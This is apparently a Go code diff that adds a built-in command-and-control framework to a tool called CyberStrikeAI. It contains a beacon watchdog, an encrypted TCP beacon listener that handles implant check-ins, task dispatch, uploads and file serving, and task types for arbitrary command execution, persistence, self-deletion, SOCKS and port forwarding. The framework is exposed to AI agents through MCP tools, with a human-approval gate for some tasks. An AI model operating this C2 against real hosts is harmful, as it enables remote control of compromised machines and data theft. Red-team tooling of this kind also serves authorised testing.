// 把超过 (sleep * (1 + jitter%) * graceFactor + minGrace) 仍未心跳的标为 dead。
|
||||
//
|
||||
// 设计要点:
|
||||
// - 单 goroutine + ticker,避免对每个会话开 timer,session 数量大时也线性 OK;
|
||||
// - 阈值随会话自身 sleep/jitter 自适应(sleep=300s 的会话不能用 sleep=5s 的判定);
|
||||
// - 全局最小宽限期 minGrace 避免 sleep 配置错误的会话被误判;
|
||||
// - 不读 implant_uuid,纯按 last_check_in 字段,与 listener 类型解耦。
|
||||
type SessionWatchdog struct {
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
interval time.Duration // 扫描周期,默认 15s
|
||||
minGrace time.Duration // 最小宽限期,默认 30s
|
||||
gracePct float64 // 心跳超时倍数,默认 3.0(即 3 倍 sleep 周期没心跳算掉线)
|
||||
stopCh chan struct{}
|
||||
}
|
||||
|
||||
// NewSessionWatchdog 创建看门狗
|
||||
func NewSessionWatchdog(m *Manager) *SessionWatchdog {
|
||||
return &SessionWatchdog{
|
||||
manager: m,
|
||||
logger: m.Logger().With(zap.String("component", "c2-watchdog")),
|
||||
interval: 15 * time.Second,
|
||||
minGrace: 30 * time.Second,
|
||||
gracePct: 3.0,
|
||||
stopCh: make(chan struct{}),
|
||||
}
|
||||
}
|
||||
|
||||
// Run 阻塞执行,直到 ctx.Done() 或 Stop()
|
||||
func (w *SessionWatchdog) Run(ctx context.Context) {
|
||||
t := time.NewTicker(w.interval)
|
||||
defer t.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-w.stopCh:
|
||||
return
|
||||
case <-t.C:
|
||||
w.tick()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Stop 停止
|
||||
func (w *SessionWatchdog) Stop() {
|
||||
select {
|
||||
case <-w.stopCh:
|
||||
default:
|
||||
close(w.stopCh)
|
||||
}
|
||||
}
|
||||
|
||||
func (w *SessionWatchdog) tick() {
|
||||
now := time.Now()
|
||||
for _, status := range []string{string(SessionActive), string(SessionSleeping)} {
|
||||
sessions, err := w.manager.DB().ListC2Sessions(database.ListC2SessionsFilter{Status: status})
|
||||
if err != nil {
|
||||
w.logger.Warn("watchdog 列表查询失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
for _, s := range sessions {
|
||||
if w.isStale(s, now) {
|
||||
if err := w.manager.MarkSessionDead(s.ID); err != nil {
|
||||
w.logger.Warn("标记会话掉线失败", zap.String("session_id", s.ID), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// isStale 判断会话是否超时
|
||||
func (w *SessionWatchdog) isStale(s *database.C2Session, now time.Time) bool {
|
||||
// 无心跳记录:以 first_seen_at 兜底
|
||||
last := s.LastCheckIn
|
||||
if last.IsZero() {
|
||||
last = s.FirstSeenAt
|
||||
}
|
||||
sleep := s.SleepSeconds
|
||||
if sleep <= 0 {
|
||||
// TCP reverse 模式 sleep=0 → 用最小宽限期判定
|
||||
return now.Sub(last) > w.minGrace*2
|
||||
}
|
||||
jitter := s.JitterPercent
|
||||
if jitter < 0 {
|
||||
jitter = 0
|
||||
}
|
||||
if jitter > 100 {
|
||||
jitter = 100
|
||||
}
|
||||
// 阈值 = sleep * (1 + jitter%) * gracePct,再加 minGrace 兜底
|
||||
expected := time.Duration(float64(sleep)*(1+float64(jitter)/100.0)*w.gracePct) * time.Second
|
||||
if expected < w.minGrace {
|
||||
expected = w.minGrace
|
||||
}
|
||||
return now.Sub(last) > expected
|
||||
}
|
||||
@@ -0,0 +1,267 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"crypto/subtle"
|
||||
"encoding/base64"
|
||||
"encoding/binary"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。
|
||||
const tcpBeaconMagic = "CSB1"
|
||||
|
||||
// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。
|
||||
const tcpBeaconMaxFrame = 64 << 20
|
||||
|
||||
func readTCPBeaconFrame(r *bufio.Reader) (cipherB64 string, err error) {
|
||||
var n uint32
|
||||
if err = binary.Read(r, binary.BigEndian, &n); err != nil {
|
||||
return "", err
|
||||
}
|
||||
if n == 0 || int64(n) > int64(tcpBeaconMaxFrame) {
|
||||
return "", fmt.Errorf("invalid tcp beacon frame size")
|
||||
}
|
||||
buf := make([]byte, n)
|
||||
if _, err = io.ReadFull(r, buf); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return string(buf), nil
|
||||
}
|
||||
|
||||
func writeTCPBeaconFrame(mu *sync.Mutex, conn net.Conn, cipherB64 string) error {
|
||||
if mu != nil {
|
||||
mu.Lock()
|
||||
defer mu.Unlock()
|
||||
}
|
||||
payload := []byte(cipherB64)
|
||||
if len(payload) > tcpBeaconMaxFrame {
|
||||
return fmt.Errorf("frame too large")
|
||||
}
|
||||
var hdr [4]byte
|
||||
binary.BigEndian.PutUint32(hdr[:], uint32(len(payload)))
|
||||
if _, err := conn.Write(hdr[:]); err != nil {
|
||||
return err
|
||||
}
|
||||
_, err := conn.Write(payload)
|
||||
return err
|
||||
}
|
||||
|
||||
func tcpBeaconCheckToken(expected, got string) bool {
|
||||
if got == "" || expected == "" {
|
||||
return false
|
||||
}
|
||||
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
|
||||
}
|
||||
|
||||
// handleTCPBeaconSession 处理已消费魔数 CSB1 之后的 TCP Beacon 会话(与 HTTP Beacon 相同的 AES-GCM + JSON 语义)。
|
||||
func (l *TCPReverseListener) handleTCPBeaconSession(conn net.Conn, br *bufio.Reader) {
|
||||
var writeMu sync.Mutex
|
||||
defer func() {
|
||||
_ = conn.Close()
|
||||
}()
|
||||
|
||||
for {
|
||||
_ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute))
|
||||
cipherB64, err := readTCPBeaconFrame(br)
|
||||
if err != nil {
|
||||
if err != io.EOF && !isClosedConnErr(err) {
|
||||
l.logger.Debug("tcp beacon read frame", zap.Error(err))
|
||||
}
|
||||
return
|
||||
}
|
||||
plain, err := DecryptAESGCM(l.rec.EncryptionKey, cipherB64)
|
||||
if err != nil {
|
||||
l.logger.Warn("tcp beacon decrypt failed", zap.Error(err))
|
||||
return
|
||||
}
|
||||
|
||||
var env map[string]json.RawMessage
|
||||
if err := json.Unmarshal(plain, &env); err != nil {
|
||||
l.logger.Warn("tcp beacon json", zap.Error(err))
|
||||
return
|
||||
}
|
||||
opBytes, ok := env["op"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var op string
|
||||
if err := json.Unmarshal(opBytes, &op); err != nil {
|
||||
return
|
||||
}
|
||||
var token string
|
||||
if tb, ok := env["token"]; ok {
|
||||
_ = json.Unmarshal(tb, &token)
|
||||
}
|
||||
if !tcpBeaconCheckToken(l.rec.ImplantToken, token) {
|
||||
l.logger.Warn("tcp beacon bad token", zap.String("listener_id", l.rec.ID))
|
||||
return
|
||||
}
|
||||
|
||||
var resp interface{}
|
||||
switch op {
|
||||
case "check_in":
|
||||
rawCheck, ok := env["check"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var req ImplantCheckInRequest
|
||||
if err := json.Unmarshal(rawCheck, &req); err != nil {
|
||||
return
|
||||
}
|
||||
if req.UserAgent == "" {
|
||||
req.UserAgent = "tcp_beacon"
|
||||
}
|
||||
if req.SleepSeconds <= 0 {
|
||||
req.SleepSeconds = l.cfg.DefaultSleep
|
||||
}
|
||||
host, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
|
||||
if req.Metadata == nil {
|
||||
req.Metadata = map[string]interface{}{}
|
||||
}
|
||||
req.Metadata["transport"] = "tcp_beacon"
|
||||
req.Metadata["remote"] = conn.RemoteAddr().String()
|
||||
if strings.TrimSpace(req.InternalIP) == "" {
|
||||
req.InternalIP = host
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
|
||||
if err != nil {
|
||||
l.logger.Warn("tcp beacon check_in", zap.Error(err))
|
||||
return
|
||||
}
|
||||
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: session.ID,
|
||||
Status: string(TaskQueued),
|
||||
Limit: 1,
|
||||
})
|
||||
resp = ImplantCheckInResponse{
|
||||
SessionID: session.ID,
|
||||
NextSleep: session.SleepSeconds,
|
||||
NextJitter: session.JitterPercent,
|
||||
HasTasks: len(queued) > 0,
|
||||
ServerTime: NowUnixMillis(),
|
||||
}
|
||||
|
||||
case "tasks":
|
||||
rawSID, ok := env["session_id"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var sessionID string
|
||||
if err := json.Unmarshal(rawSID, &sessionID); err != nil || sessionID == "" {
|
||||
return
|
||||
}
|
||||
sess, err := l.manager.DB().GetC2Session(sessionID)
|
||||
if err != nil || sess == nil || sess.ListenerID != l.rec.ID {
|
||||
return
|
||||
}
|
||||
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
if envelopes == nil {
|
||||
envelopes = []TaskEnvelope{}
|
||||
}
|
||||
resp = map[string]interface{}{"tasks": envelopes}
|
||||
|
||||
case "result":
|
||||
raw, ok := env["result"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var report TaskResultReport
|
||||
if err := json.Unmarshal(raw, &report); err != nil {
|
||||
return
|
||||
}
|
||||
if err := l.manager.IngestTaskResult(report); err != nil {
|
||||
return
|
||||
}
|
||||
resp = map[string]string{"ok": "1"}
|
||||
|
||||
case "upload":
|
||||
raw, ok := env["upload"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var up struct {
|
||||
TaskID string `json:"task_id"`
|
||||
DataB64 string `json:"data_b64"`
|
||||
}
|
||||
if err := json.Unmarshal(raw, &up); err != nil || up.TaskID == "" {
|
||||
return
|
||||
}
|
||||
plainFile, err := base64.StdEncoding.DecodeString(up.DataB64)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
dir := filepath.Join(l.manager.StorageDir(), "uploads")
|
||||
if err := os.MkdirAll(dir, 0o755); err != nil {
|
||||
return
|
||||
}
|
||||
dst := filepath.Join(dir, up.TaskID+".bin")
|
||||
if err := os.WriteFile(dst, plainFile, 0o644); err != nil {
|
||||
return
|
||||
}
|
||||
resp = map[string]interface{}{"ok": 1, "size": len(plainFile)}
|
||||
|
||||
case "file":
|
||||
raw, ok := env["file"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var fr struct {
|
||||
FileID string `json:"file_id"`
|
||||
}
|
||||
if err := json.Unmarshal(raw, &fr); err != nil || fr.FileID == "" {
|
||||
return
|
||||
}
|
||||
if strings.Contains(fr.FileID, "/") || strings.Contains(fr.FileID, "\\") || strings.Contains(fr.FileID, "..") {
|
||||
return
|
||||
}
|
||||
fpath := filepath.Join(l.manager.StorageDir(), "downstream", fr.FileID+".bin")
|
||||
absPath, err := filepath.Abs(fpath)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
|
||||
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
|
||||
return
|
||||
}
|
||||
data, err := os.ReadFile(absPath)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
resp = map[string]interface{}{
|
||||
"file_data": base64Encode(data),
|
||||
}
|
||||
|
||||
default:
|
||||
return
|
||||
}
|
||||
|
||||
body, err := json.Marshal(resp)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
_ = conn.SetWriteDeadline(time.Now().Add(3 * time.Minute))
|
||||
if err := writeTCPBeaconFrame(&writeMu, conn, enc); err != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,258 @@
|
||||
// Package c2 实现 CyberStrikeAI 内置 C2(Command & Control)框架。
|
||||
//
|
||||
// 设计概述:
|
||||
// - Manager 作为统一入口,被 internal/app 实例化并注入到所有需要操控 C2 的组件
|
||||
// (HTTP handler、MCP 工具、HITL 桥、攻击链记录器等)。
|
||||
// - Listener 是抽象接口,下挂 tcp_reverse / http_beacon / https_beacon / websocket
|
||||
// 等不同传输方式的具体实现,全部通过 listener.Registry 工厂创建。
|
||||
// - 任务调度走数据库(c2_tasks 表)+ 内存事件总线(EventBus)混合:
|
||||
// * 状态变化与历史记录靠 SQLite 实现持久化与重启恢复;
|
||||
// * 高频实时通知(如新任务结果)通过 EventBus 推送给 SSE/WS 订阅者,避免轮询。
|
||||
// - Crypto 层固定 AES-256-GCM,每个 Listener 独立 32 字节密钥;密钥仅服务端持有
|
||||
// 和编译期注入到 implant,事件流不允许导出明文密钥。
|
||||
package c2
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
// ListenerType 监听器类型,与 c2_listeners.type 字段一致
|
||||
type ListenerType string
|
||||
|
||||
const (
|
||||
ListenerTypeTCPReverse ListenerType = "tcp_reverse"
|
||||
ListenerTypeHTTPBeacon ListenerType = "http_beacon"
|
||||
ListenerTypeHTTPSBeacon ListenerType = "https_beacon"
|
||||
ListenerTypeWebSocket ListenerType = "websocket"
|
||||
)
|
||||
|
||||
// AllListenerTypes 列出所有受支持的监听器类型,便于校验与前端枚举
|
||||
func AllListenerTypes() []ListenerType {
|
||||
return []ListenerType{
|
||||
ListenerTypeTCPReverse,
|
||||
ListenerTypeHTTPBeacon,
|
||||
ListenerTypeHTTPSBeacon,
|
||||
ListenerTypeWebSocket,
|
||||
}
|
||||
}
|
||||
|
||||
// IsValidListenerType 校验前端/MCP 入参是否为合法 type
|
||||
func IsValidListenerType(t string) bool {
|
||||
t = strings.ToLower(strings.TrimSpace(t))
|
||||
for _, lt := range AllListenerTypes() {
|
||||
if string(lt) == t {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// SessionStatus 与 c2_sessions.status 一致
|
||||
type SessionStatus string
|
||||
|
||||
const (
|
||||
SessionActive SessionStatus = "active"
|
||||
SessionSleeping SessionStatus = "sleeping"
|
||||
SessionDead SessionStatus = "dead"
|
||||
SessionKilled SessionStatus = "killed"
|
||||
)
|
||||
|
||||
// TaskStatus 与 c2_tasks.status 一致
|
||||
type TaskStatus string
|
||||
|
||||
const (
|
||||
TaskQueued TaskStatus = "queued"
|
||||
TaskSent TaskStatus = "sent"
|
||||
TaskRunning TaskStatus = "running"
|
||||
TaskSuccess TaskStatus = "success"
|
||||
TaskFailed TaskStatus = "failed"
|
||||
TaskCancelled TaskStatus = "cancelled"
|
||||
)
|
||||
|
||||
// TaskType 任务类型(与 beacon 端协商,避免硬编码字符串)
|
||||
type TaskType string
|
||||
|
||||
const (
|
||||
// 通用任务
|
||||
TaskTypeExec TaskType = "exec" // 执行任意命令(shell -c)
|
||||
TaskTypeShell TaskType = "shell" // 交互式命令(保持 cwd)
|
||||
TaskTypePwd TaskType = "pwd" // 当前目录
|
||||
TaskTypeCd TaskType = "cd" // 切目录
|
||||
TaskTypeLs TaskType = "ls" // 列目录
|
||||
TaskTypePs TaskType = "ps" // 列进程
|
||||
TaskTypeKillProc TaskType = "kill_proc" // 杀进程
|
||||
TaskTypeUpload TaskType = "upload" // 推文件到目标
|
||||
TaskTypeDownload TaskType = "download" // 拉文件回本机
|
||||
TaskTypeScreenshot TaskType = "screenshot" // 截图
|
||||
TaskTypeSleep TaskType = "sleep" // 调整心跳节律
|
||||
TaskTypeExit TaskType = "exit" // 让 implant 退出(不会自删二进制)
|
||||
TaskTypeSelfDelete TaskType = "self_delete" // 退出 + 自删二进制(持久化清理)
|
||||
// 高级任务
|
||||
TaskTypePortFwd TaskType = "port_fwd"
|
||||
TaskTypeSocksStart TaskType = "socks_start"
|
||||
TaskTypeSocksStop TaskType = "socks_stop"
|
||||
TaskTypeLoadAssembly TaskType = "load_assembly"
|
||||
TaskTypePersist TaskType = "persist"
|
||||
)
|
||||
|
||||
// AllTaskTypes 全部 task_type,便于工具 schema 列出 enum
|
||||
func AllTaskTypes() []TaskType {
|
||||
return []TaskType{
|
||||
TaskTypeExec, TaskTypeShell,
|
||||
TaskTypePwd, TaskTypeCd, TaskTypeLs, TaskTypePs, TaskTypeKillProc,
|
||||
TaskTypeUpload, TaskTypeDownload, TaskTypeScreenshot,
|
||||
TaskTypeSleep, TaskTypeExit, TaskTypeSelfDelete,
|
||||
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeSocksStop, TaskTypeLoadAssembly,
|
||||
TaskTypePersist,
|
||||
}
|
||||
}
|
||||
|
||||
// IsDangerousTaskType 标记需要 HITL 二次确认的任务类型;
|
||||
// 与 internal/handler/hitl.go 现有的 tool_whitelist 概念呼应:白名单外 → 走审批。
|
||||
func IsDangerousTaskType(t TaskType) bool {
|
||||
switch t {
|
||||
case TaskTypeKillProc, TaskTypeUpload, TaskTypeSelfDelete,
|
||||
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeLoadAssembly, TaskTypePersist:
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// ListenerConfig 解码后的监听器运行配置(来自 c2_listeners.config_json)
|
||||
type ListenerConfig struct {
|
||||
// HTTP/HTTPS Beacon 公共字段
|
||||
BeaconCheckInPath string `json:"beacon_check_in_path,omitempty"` // 默认 "/check_in"
|
||||
BeaconTasksPath string `json:"beacon_tasks_path,omitempty"` // 默认 "/tasks"
|
||||
BeaconResultPath string `json:"beacon_result_path,omitempty"` // 默认 "/result"
|
||||
BeaconUploadPath string `json:"beacon_upload_path,omitempty"` // 默认 "/upload"
|
||||
BeaconFilePath string `json:"beacon_file_path,omitempty"` // 默认 "/file/"
|
||||
// HTTPS 专属
|
||||
TLSCertPath string `json:"tls_cert_path,omitempty"`
|
||||
TLSKeyPath string `json:"tls_key_path,omitempty"`
|
||||
TLSAutoSelfSign bool `json:"tls_auto_self_sign,omitempty"` // true:找不到证书时自动生成自签
|
||||
// 客户端默认参数(写到 c2_sessions 初值,beacon 也可在 check-in 时覆写)
|
||||
DefaultSleep int `json:"default_sleep,omitempty"` // 秒,默认 5
|
||||
DefaultJitter int `json:"default_jitter,omitempty"` // 0-100,默认 0
|
||||
// OPSEC:可选命令黑名单(正则)
|
||||
CommandDenyRegex []string `json:"command_deny_regex,omitempty"`
|
||||
// 任务并发上限(每个会话同时下发的最大任务数,0 表示不限制)
|
||||
MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"`
|
||||
// CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景
|
||||
CallbackHost string `json:"callback_host,omitempty"`
|
||||
}
|
||||
|
||||
// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值
|
||||
func (c *ListenerConfig) ApplyDefaults() {
|
||||
if strings.TrimSpace(c.BeaconCheckInPath) == "" {
|
||||
c.BeaconCheckInPath = "/check_in"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconTasksPath) == "" {
|
||||
c.BeaconTasksPath = "/tasks"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconResultPath) == "" {
|
||||
c.BeaconResultPath = "/result"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconUploadPath) == "" {
|
||||
c.BeaconUploadPath = "/upload"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconFilePath) == "" {
|
||||
c.BeaconFilePath = "/file/"
|
||||
}
|
||||
if c.DefaultSleep <= 0 {
|
||||
c.DefaultSleep = 5
|
||||
}
|
||||
if c.DefaultJitter < 0 {
|
||||
c.DefaultJitter = 0
|
||||
}
|
||||
if c.DefaultJitter > 100 {
|
||||
c.DefaultJitter = 100
|
||||
}
|
||||
}
|
||||
|
||||
// ImplantCheckInRequest beacon → 服务端的注册/心跳请求体(已解密后的明文)
|
||||
type ImplantCheckInRequest struct {
|
||||
ImplantUUID string `json:"uuid"`
|
||||
Hostname string `json:"hostname"`
|
||||
Username string `json:"username"`
|
||||
OS string `json:"os"`
|
||||
Arch string `json:"arch"`
|
||||
PID int `json:"pid"`
|
||||
ProcessName string `json:"process_name"`
|
||||
IsAdmin bool `json:"is_admin"`
|
||||
InternalIP string `json:"internal_ip"`
|
||||
UserAgent string `json:"user_agent,omitempty"`
|
||||
SleepSeconds int `json:"sleep_seconds"`
|
||||
JitterPercent int `json:"jitter_percent"`
|
||||
Metadata map[string]interface{} `json:"metadata,omitempty"`
|
||||
}
|
||||
|
||||
// ImplantCheckInResponse 服务端回执
|
||||
type ImplantCheckInResponse struct {
|
||||
SessionID string `json:"session_id"`
|
||||
NextSleep int `json:"next_sleep"`
|
||||
NextJitter int `json:"next_jitter"`
|
||||
HasTasks bool `json:"has_tasks"`
|
||||
ServerTime int64 `json:"server_time"`
|
||||
}
|
||||
|
||||
// TaskEnvelope 服务端 → beacon 的任务派发载体
|
||||
type TaskEnvelope struct {
|
||||
TaskID string `json:"task_id"`
|
||||
TaskType string `json:"task_type"`
|
||||
Payload map[string]interface{} `json:"payload"`
|
||||
}
|
||||
|
||||
// TaskResultReport beacon → 服务端的任务结果回传
|
||||
type TaskResultReport struct {
|
||||
TaskID string `json:"task_id"`
|
||||
Success bool `json:"success"`
|
||||
Output string `json:"output,omitempty"`
|
||||
Error string `json:"error,omitempty"`
|
||||
BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制
|
||||
BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png"
|
||||
StartedAt int64 `json:"started_at"`
|
||||
EndedAt int64 `json:"ended_at"`
|
||||
}
|
||||
|
||||
// CommonError C2 模块统一错误类型,便于 handler 层映射 HTTP 状态码
|
||||
type CommonError struct {
|
||||
Code string
|
||||
Message string
|
||||
HTTP int
|
||||
}
|
||||
|
||||
func (e *CommonError) Error() string {
|
||||
if e == nil {
|
||||
return ""
|
||||
}
|
||||
return e.Message
|
||||
}
|
||||
|
||||
// Sentinel errors,便于 errors.Is 比较
|
||||
var (
|
||||
ErrListenerNotFound = &CommonError{Code: "listener_not_found", Message: "监听器不存在", HTTP: 404}
|
||||
ErrSessionNotFound = &CommonError{Code: "session_not_found", Message: "会话不存在", HTTP: 404}
|
||||
ErrTaskNotFound = &CommonError{Code: "task_not_found", Message: "任务不存在", HTTP: 404}
|
||||
ErrProfileNotFound = &CommonError{Code: "profile_not_found", Message: "Profile 不存在", HTTP: 404}
|
||||
ErrInvalidInput = &CommonError{Code: "invalid_input", Message: "参数非法", HTTP: 400}
|
||||
ErrAuthFailed = &CommonError{Code: "auth_failed", Message: "鉴权失败", HTTP: 401}
|
||||
ErrPortInUse = &CommonError{Code: "port_in_use", Message: "端口已被占用", HTTP: 409}
|
||||
ErrListenerRunning = &CommonError{Code: "listener_running", Message: "监听器已在运行", HTTP: 409}
|
||||
ErrListenerStopped = &CommonError{Code: "listener_stopped", Message: "监听器未运行", HTTP: 409}
|
||||
ErrUnsupportedType = &CommonError{Code: "unsupported_type", Message: "不支持的监听器类型", HTTP: 400}
|
||||
)
|
||||
|
||||
// SafeBindPort 校验端口范围
|
||||
func SafeBindPort(port int) error {
|
||||
if port < 1 || port > 65535 {
|
||||
return errors.New("port must be in 1..65535")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// NowUnixMillis 统一时间戳工具
|
||||
func NowUnixMillis() int64 {
|
||||
return time.Now().UnixNano() / int64(time.Millisecond)
|
||||
}
|
||||
+225
-10
@@ -28,6 +28,7 @@ type Config struct {
|
||||
Auth AuthConfig `yaml:"auth"`
|
||||
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
|
||||
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
|
||||
C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用
|
||||
Robots RobotsConfig `yaml:"robots,omitempty" json:"robots,omitempty"` // 企业微信/钉钉/飞书等机器人配置
|
||||
RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式)
|
||||
Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色
|
||||
@@ -62,6 +63,126 @@ type MultiAgentConfig struct {
|
||||
EinoSkills MultiAgentEinoSkillsConfig `yaml:"eino_skills,omitempty" json:"eino_skills,omitempty"`
|
||||
// EinoMiddleware wires optional ADK middleware (patchtoolcalls, toolsearch, plantask, reduction) and Deep extras.
|
||||
EinoMiddleware MultiAgentEinoMiddlewareConfig `yaml:"eino_middleware,omitempty" json:"eino_middleware,omitempty"`
|
||||
// EinoCallbacks attaches CloudWeGo eino callbacks.InitCallbacks on ADK Runner context (structured logs + optional SSE trace).
|
||||
EinoCallbacks MultiAgentEinoCallbacksConfig `yaml:"eino_callbacks,omitempty" json:"eino_callbacks,omitempty"`
|
||||
}
|
||||
|
||||
// MultiAgentEinoCallbacksConfig enables Eino unified callbacks on each ADK agent run (deep / plan_execute / supervisor / eino_single).
|
||||
// Modes: log_only (zap + optional OTel; no SSE to browser), sse (adds client SSE eino_trace_* when sse_trace_to_client), full (sse rules + stream callback copies closed).
|
||||
type MultiAgentEinoCallbacksConfig struct {
|
||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||
Mode string `yaml:"mode,omitempty" json:"mode,omitempty"` // log_only | sse | full; empty with enabled=true defaults to log_only
|
||||
// SseTraceToClient when true emits eino_trace_* SSE for UI (use only for admin/debug; nil/false recommended in production).
|
||||
SseTraceToClient *bool `yaml:"sse_trace_to_client,omitempty" json:"sse_trace_to_client,omitempty"`
|
||||
// Otel configures OpenTelemetry trace export (independent of mode; exporter none disables export even if enabled).
|
||||
Otel MultiAgentEinoCallbacksOtelConfig `yaml:"otel,omitempty" json:"otel,omitempty"`
|
||||
// MaxInputSummaryRunes / MaxOutputSummaryRunes cap text placed in SSE payloads and debug logs (not full payloads).
|
||||
MaxInputSummaryRunes int `yaml:"max_input_summary_runes,omitempty" json:"max_input_summary_runes,omitempty"`
|
||||
MaxOutputSummaryRunes int `yaml:"max_output_summary_runes,omitempty" json:"max_output_summary_runes,omitempty"`
|
||||
// ZapVerbose when true logs input/output summaries at zap.Debug on start/end; false uses Info with short fields only.
|
||||
ZapVerbose bool `yaml:"zap_verbose,omitempty" json:"zap_verbose,omitempty"`
|
||||
}
|
||||
|
||||
// MultiAgentEinoCallbacksOtelConfig OpenTelemetry for Eino callback spans (W3C trace in collector / stdout).
|
||||
type MultiAgentEinoCallbacksOtelConfig struct {
|
||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||
ServiceName string `yaml:"service_name,omitempty" json:"service_name,omitempty"`
|
||||
Exporter string `yaml:"exporter,omitempty" json:"exporter,omitempty"` // none | stdout | otlphttp
|
||||
OTLPEndpoint string `yaml:"otlp_endpoint,omitempty" json:"otlp_endpoint,omitempty"` // host:port, e.g. localhost:4318 (path /v1/traces)
|
||||
SampleRatio float64 `yaml:"sample_ratio,omitempty" json:"sample_ratio,omitempty"` // 0–1, default 1.0
|
||||
}
|
||||
|
||||
// EinoCallbacksModeEffective returns off | log_only | sse | full.
|
||||
func (c MultiAgentEinoCallbacksConfig) EinoCallbacksModeEffective() string {
|
||||
if !c.Enabled {
|
||||
return "off"
|
||||
}
|
||||
m := strings.TrimSpace(strings.ToLower(c.Mode))
|
||||
switch m {
|
||||
case "log_only":
|
||||
return "log_only"
|
||||
case "sse":
|
||||
return "sse"
|
||||
case "full":
|
||||
return "full"
|
||||
case "":
|
||||
return "log_only"
|
||||
default:
|
||||
return "log_only"
|
||||
}
|
||||
}
|
||||
|
||||
// SseTraceToClientEffective is false unless explicitly set true (best practice: do not expose framework traces to end users by default).
|
||||
func (c MultiAgentEinoCallbacksConfig) SseTraceToClientEffective() bool {
|
||||
if c.SseTraceToClient == nil {
|
||||
return false
|
||||
}
|
||||
return *c.SseTraceToClient
|
||||
}
|
||||
|
||||
// ShouldEmitEinoTraceSSE is true when client-visible trace events should be sent over progress/SSE.
|
||||
func (c MultiAgentEinoCallbacksConfig) ShouldEmitEinoTraceSSE(mode string) bool {
|
||||
if !c.SseTraceToClientEffective() {
|
||||
return false
|
||||
}
|
||||
return mode == "sse" || mode == "full"
|
||||
}
|
||||
|
||||
// OtelExporterEffective returns none | stdout | otlphttp.
|
||||
func (c MultiAgentEinoCallbacksOtelConfig) OtelExporterEffective() string {
|
||||
e := strings.TrimSpace(strings.ToLower(c.Exporter))
|
||||
switch e {
|
||||
case "none", "stdout", "otlphttp":
|
||||
return e
|
||||
case "":
|
||||
if c.Enabled {
|
||||
return "stdout"
|
||||
}
|
||||
return "none"
|
||||
default:
|
||||
return "none"
|
||||
}
|
||||
}
|
||||
|
||||
// OtelTracingActive is true when spans should be started (enabled + non-none exporter).
|
||||
func (c MultiAgentEinoCallbacksConfig) OtelTracingActive() bool {
|
||||
if !c.Otel.Enabled {
|
||||
return false
|
||||
}
|
||||
return c.Otel.OtelExporterEffective() != "none"
|
||||
}
|
||||
|
||||
func (c MultiAgentEinoCallbacksOtelConfig) ServiceNameEffective() string {
|
||||
s := strings.TrimSpace(c.ServiceName)
|
||||
if s != "" {
|
||||
return s
|
||||
}
|
||||
return "cyberstrike-ai"
|
